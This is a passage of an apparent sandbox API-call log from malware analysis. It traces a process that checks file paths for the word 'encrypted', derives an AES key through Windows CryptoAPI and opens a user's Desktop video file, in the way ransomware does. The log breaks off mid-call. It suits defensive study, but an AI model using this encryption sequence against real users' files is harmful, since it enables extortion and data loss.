HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pRtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RtMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tMXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MXaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XaA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aA65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="65Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jvr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vr0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r0xt.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.326] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.326] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0030.326] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.326] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.326] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.326] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.326] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.326] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.327] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.327] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8276fa90, ftCreationTime.dwHighDateTime=0x1d5bada, ftLastAccessTime.dwLowDateTime=0x58a2bd00, ftLastAccessTime.dwHighDateTime=0x1d5ba83, ftLastWriteTime.dwLowDateTime=0x58a2bd00, ftLastWriteTime.dwHighDateTime=0x1d5ba83, nFileSizeHigh=0x0, nFileSizeLow=0x140b1, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="pRtMXaA65Jvr0xt.mkv", cAlternateFileName="PRTMXA~1.MKV")) returned 0x7c2240 [0030.327] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0030.327] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.327] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.327] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.327] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.327] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0030.327] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.327] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0030.327] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.327] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.327] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0030.327] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.327] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.327] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.329] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.329] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.329] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0030.329] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.329] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0030.330] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.330] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.330] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0030.330] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.331] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.331] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.331] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.331] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.331] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.331] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.331] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.331] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.331] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.331] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.331] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.331] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0030.331] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.331] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.331] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.331] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.331] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.331] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.331] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.331] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.331] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.331] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.331] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.331] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.332] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.332] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.332] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.332] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.332] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.332] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.332] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.332] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0030.332] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.332] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.332] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.332] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.332] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0030.332] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.332] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.332] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.332] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.332] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.332] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0030.332] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.332] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.332] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.332] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.332] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.332] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.333] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.333] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.333] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0030.333] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.333] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.333] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.333] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.333] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.333] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.333] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0030.333] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.333] CryptDestroyHash (hHash=0x7c2100) returned 1 [0030.333] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.333] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.333] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.333] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.333] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.333] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\prtmxaa65jvr0xt.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.334] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.334] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, 